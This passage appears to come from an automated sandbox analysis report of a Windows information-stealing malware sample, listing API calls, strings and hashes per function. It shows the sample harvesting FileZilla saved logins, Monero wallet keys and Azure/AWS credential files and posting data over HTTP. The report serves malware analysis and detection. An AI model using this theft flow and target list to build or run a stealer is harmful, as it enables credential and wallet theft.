                            • Part of subcall function 001299C0: LocalAlloc.KERNEL32(00000040,?), ref: 00129A31
                            • Part of subcall function 001299C0: ReadFile.KERNEL32(000000FF,?,00000000,0012148F,00000000), ref: 00129A5A
                            • Part of subcall function 001299C0: LocalFree.KERNEL32(0012148F), ref: 00129A90
                            • Part of subcall function 001299C0: CloseHandle.KERNEL32(000000FF), ref: 00129A9A
                            • Part of subcall function 00138E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00138E52
                          • GetProcessHeap.KERNEL32(00000000,000F423F,00140DBA,00140DB7,00140DB6,00140DB3), ref: 00130362
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00130369
                          • StrStrA.SHLWAPI(00000000,<Host>), ref: 00130385
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00140DB2), ref: 00130393
                          • StrStrA.SHLWAPI(00000000,<Port>), ref: 001303CF
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00140DB2), ref: 001303DD
                          • StrStrA.SHLWAPI(00000000,<User>), ref: 00130419
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00140DB2), ref: 00130427
                          • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00130463
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00140DB2), ref: 00130475
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00140DB2), ref: 00130502
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00140DB2), ref: 0013051A
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00140DB2), ref: 00130532
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00140DB2), ref: 0013054A
                          • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00130562
                          • lstrcat.KERNEL32(?,profile: null), ref: 00130571
                          • lstrcat.KERNEL32(?,url: ), ref: 00130580
                          • lstrcat.KERNEL32(?,00000000), ref: 00130593
                          • lstrcat.KERNEL32(?,00141678), ref: 001305A2
                          • lstrcat.KERNEL32(?,00000000), ref: 001305B5
                          • lstrcat.KERNEL32(?,0014167C), ref: 001305C4
                          • lstrcat.KERNEL32(?,login: ), ref: 001305D3
                          • lstrcat.KERNEL32(?,00000000), ref: 001305E6
                          • lstrcat.KERNEL32(?,00141688), ref: 001305F5
                          • lstrcat.KERNEL32(?,password: ), ref: 00130604
                          • lstrcat.KERNEL32(?,00000000), ref: 00130617
                          • lstrcat.KERNEL32(?,00141698), ref: 00130626
                          • lstrcat.KERNEL32(?,0014169C), ref: 00130635
                          • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00140DB2), ref: 0013068E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                          • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                          • API String ID: 1942843190-555421843
                          • Opcode ID: 7eff7f9b94417c3c2cb9cf1f6e9397f00746e74649f77597cbc2089729dbf8aa
                          • Instruction ID: 5561efff4b7b17fc000f0820377fa3c5d9713ab1adadae03e44fa9106ddfde26
                          • Opcode Fuzzy Hash: 7eff7f9b94417c3c2cb9cf1f6e9397f00746e74649f77597cbc2089729dbf8aa
                          • Instruction Fuzzy Hash: CBD13072900208ABCB05EBF4DD96EEE777CAF28301F848458F142B7091DF75AA49DB61
                          Function 00125960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0013A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0013A7E6
                            • Part of subcall function 001247B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00124839
                            • Part of subcall function 001247B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00124849
                            • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 001259F8
                          • StrCmpCA.SHLWAPI(?,00F0F920), ref: 00125A13
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00125B93
                          • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00F0F8E0,00000000,?,00F0EBA8,00000000,?,00141A1C), ref: 00125E71
                          • lstrlen.KERNEL32(00000000), ref: 00125E82
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00125E93
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00125E9A
                          • lstrlen.KERNEL32(00000000), ref: 00125EAF
                          • lstrlen.KERNEL32(00000000), ref: 00125ED8
                          • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00125EF1
                          • lstrlen.KERNEL32(00000000,?,?), ref: 00125F1B
                          • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00125F2F
                          • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00125F4C
                          • InternetCloseHandle.WININET(00000000), ref: 00125FB0
                          • InternetCloseHandle.WININET(00000000), ref: 00125FBD
                          • HttpOpenRequestA.WININET(00000000,00F0F8B0,?,00F0EFA8,00000000,00000000,00400100,00000000), ref: 00125BF8
                            • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00F09838,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                            • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                            • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                            • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                            • Part of subcall function 0013A920: lstrcpy.KERNEL32(00000000,?), ref: 0013A972
                            • Part of subcall function 0013A920: lstrcat.KERNEL32(00000000), ref: 0013A982
                          • InternetCloseHandle.WININET(00000000), ref: 00125FC7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                          • String ID: "$"$------$------$------
                          • API String ID: 874700897-2180234286
                          • Opcode ID: 5abbfb5ccb874e0b3f87f5d319d7d9daed6e5395672bf01b21c280c4e1784273
                          • Instruction ID: 356a0e46be21a76413d7417e62a992453b948d2014d811093d7dac1fda0dce4b
                          • Opcode Fuzzy Hash: 5abbfb5ccb874e0b3f87f5d319d7d9daed6e5395672bf01b21c280c4e1784273
                          • Instruction Fuzzy Hash: C612DD72860118ABDB15EBA0DCA5FEEB378BF24701F904199F146730A1EF706A49CF65
                          Function 0012CEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                            • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00F09838,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                            • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                            • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                            • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                            • Part of subcall function 00138B60: GetSystemTime.KERNEL32(00140E1A,00F0EC08,001405AE,?,?,001213F9,?,0000001A,00140E1A,00000000,?,00F09838,?,\Monero\wallet.keys,00140E17), ref: 00138B86
                            • Part of subcall function 0013A920: lstrcpy.KERNEL32(00000000,?), ref: 0013A972
                            • Part of subcall function 0013A920: lstrcat.KERNEL32(00000000), ref: 0013A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0012CF83
                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0012D0C7
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0012D0CE
                          • lstrcat.KERNEL32(?,00000000), ref: 0012D208
                          • lstrcat.KERNEL32(?,00141478), ref: 0012D217
                          • lstrcat.KERNEL32(?,00000000), ref: 0012D22A
                          • lstrcat.KERNEL32(?,0014147C), ref: 0012D239
                          • lstrcat.KERNEL32(?,00000000), ref: 0012D24C
                          • lstrcat.KERNEL32(?,00141480), ref: 0012D25B
                          • lstrcat.KERNEL32(?,00000000), ref: 0012D26E
                          • lstrcat.KERNEL32(?,00141484), ref: 0012D27D
                          • lstrcat.KERNEL32(?,00000000), ref: 0012D290
                          • lstrcat.KERNEL32(?,00141488), ref: 0012D29F
                          • lstrcat.KERNEL32(?,00000000), ref: 0012D2B2
                          • lstrcat.KERNEL32(?,0014148C), ref: 0012D2C1
                          • lstrcat.KERNEL32(?,00000000), ref: 0012D2D4
                          • lstrcat.KERNEL32(?,00141490), ref: 0012D2E3
                            • Part of subcall function 0013A820: lstrlen.KERNEL32(00124F05,?,?,00124F05,00140DDE), ref: 0013A82B
                            • Part of subcall function 0013A820: lstrcpy.KERNEL32(00140DDE,00000000), ref: 0013A885
                          • lstrlen.KERNEL32(?), ref: 0012D32A
                          • lstrlen.KERNEL32(?), ref: 0012D339
                            • Part of subcall function 0013AA70: StrCmpCA.SHLWAPI(00F09A18,0012A7A7,?,0012A7A7,00F09A18), ref: 0013AA8F
                          • DeleteFileA.KERNEL32(00000000), ref: 0012D3B4
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                          • String ID:
                          • API String ID: 1956182324-0
                          • Opcode ID: d3134bc56c4540df9208354ed5749bd6c83470df55ea343aab2bfa723462c1ab
                          • Instruction ID: b4f2caaa8e3ec214bb659430936f019456c5227443c7eb7544b4e70051743c67
                          • Opcode Fuzzy Hash: d3134bc56c4540df9208354ed5749bd6c83470df55ea343aab2bfa723462c1ab
                          • Instruction Fuzzy Hash: 2EE10A72910118ABCB05EBA0DD96EEE777CBF24301F904158F146B70A1DF75AA09CFA2
                          Function 0012C990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                            • Part of subcall function 0013A920: lstrcpy.KERNEL32(00000000,?), ref: 0013A972
                            • Part of subcall function 0013A920: lstrcat.KERNEL32(00000000), ref: 0013A982
                            • Part of subcall function 0013A8A0: lstrcpy.KERNEL32(?,00140E17), ref: 0013A905
                            • Part of subcall function 0013A9B0: lstrlen.KERNEL32(?,00F09838,?,\Monero\wallet.keys,00140E17), ref: 0013A9C5
                            • Part of subcall function 0013A9B0: lstrcpy.KERNEL32(00000000), ref: 0013AA04
                            • Part of subcall function 0013A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0013AA12
                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00F0D508,00000000,?,0014144C,00000000,?,?), ref: 0012CA6C
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0012CA89
                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0012CA95
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0012CAA8
                          • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0012CAD9
                          • StrStrA.SHLWAPI(?,00F0D688,00140B52), ref: 0012CAF7
                          • StrStrA.SHLWAPI(00000000,00F0D640), ref: 0012CB1E
                          • StrStrA.SHLWAPI(?,00F0E250,00000000,?,00141458,00000000,?,00000000,00000000,?,00F09A88,00000000,?,00141454,00000000,?), ref: 0012CCA2
                          • StrStrA.SHLWAPI(00000000,00F0E3F0), ref: 0012CCB9
                            • Part of subcall function 0012C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0012C871
                            • Part of subcall function 0012C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0012C87C
                          • StrStrA.SHLWAPI(?,00F0E3F0,00000000,?,0014145C,00000000,?,00000000,00F09A68), ref: 0012CD5A
                          • StrStrA.SHLWAPI(00000000,00F09818), ref: 0012CD71
                            • Part of subcall function 0012C820: lstrcat.KERNEL32(?,00140B46), ref: 0012C943
                            • Part of subcall function 0012C820: lstrcat.KERNEL32(?,00140B47), ref: 0012C957
                            • Part of subcall function 0012C820: lstrcat.KERNEL32(?,00140B4E), ref: 0012C978
                          • lstrlen.KERNEL32(00000000), ref: 0012CE44
                          • CloseHandle.KERNEL32(00000000), ref: 0012CE9C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                          • String ID:
                          • API String ID: 3744635739-3916222277
                          • Opcode ID: 51d281fda78b0e4206ef61a9f0e99a474ede1df458d00c44b85443473ec110a6
                          • Instruction ID: df2cbc6c3912c76a69765ce11a7b81001357d6466406c7442063595719f44866
                          • Opcode Fuzzy Hash: 51d281fda78b0e4206ef61a9f0e99a474ede1df458d00c44b85443473ec110a6
                          • Instruction Fuzzy Hash: CBE1F071D10108ABDB15EBA4DC96FEEB778AF24301F804199F14677191EF706A4ACFA2
                          Function 00138320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 0013A740: lstrcpy.KERNEL32(00140E17,00000000), ref: 0013A788
                          • RegOpenKeyExA.ADVAPI32(00000000,00F0B878,00000000,00020019,00000000,001405B6), ref: 001383A4
                          • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00138426
                          • wsprintfA.USER32 ref: 00138459
                          • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0013847B
                          • RegCloseKey.ADVAPI32(00000000), ref: 0013848C
                          • RegCloseKey.ADVAPI32(00000000), ref: 00138499
                            • Part of subcall function 0013A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0013A7E6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseOpenlstrcpy$Enumwsprintf
                          • String ID: - $%s\%s$?
                          • API String ID: 3246050789-3278919252
                          • Opcode ID: d0e25310d622febf9e9cbe222535976cb2adaa80838186722dac38c04b169352
                          • Instruction ID: eee742040809c0b4afcfe97b96a7b9aa48e541a1c39b4360b6a9458f7f92d774
                          • Opcode Fuzzy Hash: d0e25310d622febf9e9cbe222535976cb2adaa80838186722dac38c04b169352
                          • Instruction Fuzzy Hash: DB810CB1910218ABEB25DB50CC95FEA77B8FF58700F4082D9F149A6140DF716B85CF95
                          Function 00134D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00138DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00138E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00134DB0
                          • lstrcat.KERNEL32(?,\.azure\), ref: 00134DCD
                            • Part of subcall function 00134910: wsprintfA.USER32 ref: 0013492C
                            • Part of subcall function 00134910: FindFirstFileA.KERNEL32(?,?), ref: 00134943
                          • lstrcat.KERNEL32(?,00000000), ref: 00134E3C
                          • lstrcat.KERNEL32(?,\.aws\), ref: 00134E59
                            • Part of subcall function 00134910: StrCmpCA.SHLWAPI(?,00140FDC), ref: 00134971
                            • Part of subcall function 00134910: StrCmpCA.SHLWAPI(?,00140FE0), ref: 00134987
                            • Part of subcall function 00134910: FindNextFileA.KERNEL32(000000FF,?), ref: 00134B7D
                            • Part of subcall function 00134910: FindClose.KERNEL32(000000FF), ref: 00134B92
                          • lstrcat.KERNEL32(?,00000000), ref: 00134EC8
                          • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00134EE5
                            • Part of subcall function 00134910: wsprintfA.USER32 ref: 001349B0
                            • Part of subcall function 00134910: StrCmpCA.SHLWAPI(?,001408D2), ref: 001349C5
                            • Part of subcall function 00134910: wsprintfA.USER32 ref: 001349E2
                            • Part of subcall function 00134910: PathMatchSpecA.SHLWAPI(?,?), ref: 00134A1E
                            • Part of subcall function 00134910: lstrcat.KERNEL32(?,00F0F8A0), ref: 00134A4A
                            • Part of subcall function 00134910: lstrcat.KERNEL32(?,00140FF8), ref: 00134A5C
                            • Part of subcall function 00134910: lstrcat.KERNEL32(?,?), ref: 00134A70
                            • Part of subcall function 00134910: lstrcat.KERNEL32(?,00140FFC), ref: 00134A82
                            • Part of subcall function 00134910: lstrcat.KERNEL32(?,?), ref: 00134A96
                            • Part of subcall function 00134910: CopyFileA.KERNEL32(?,?,00000001), ref: 00134AAC
                            • Part of subcall function 00134910: DeleteFileA.KERNEL32(?), ref: 00134B31
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284256670.000000000062A000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284398354.00000000007D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2284417050.00000000007D1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_120000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                          • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                          • API String ID: 949356159-974132213
                          • Opcode ID: 3de5d44fc0d7891701042e9b94752750c90e2581c131f423a4b0f4d3c808a3d5
                          • Instruction ID: d1178a3cd8d02df0eda92f2006852fc55003effb727cecdf9f9c43d5866c3fca
                          • Opcode Fuzzy Hash: 3de5d44fc0d7891701042e9b94752750c90e2581c131f423a4b0f4d3c808a3d5
                          • Instruction Fuzzy Hash: BC4183BA94021877C710F760EC57FED3638AB34705F404894B289670C2EFB197C88B92
                          Function 00139010 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 184COMMON
                          Download Yara Rule
                          APIs
                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0013906C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2283532282.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                          • Associated: 00000000.00000002.2283510477.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.00000000001DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.0000000000202000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283532282.000000000036A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000037E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2283735694.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
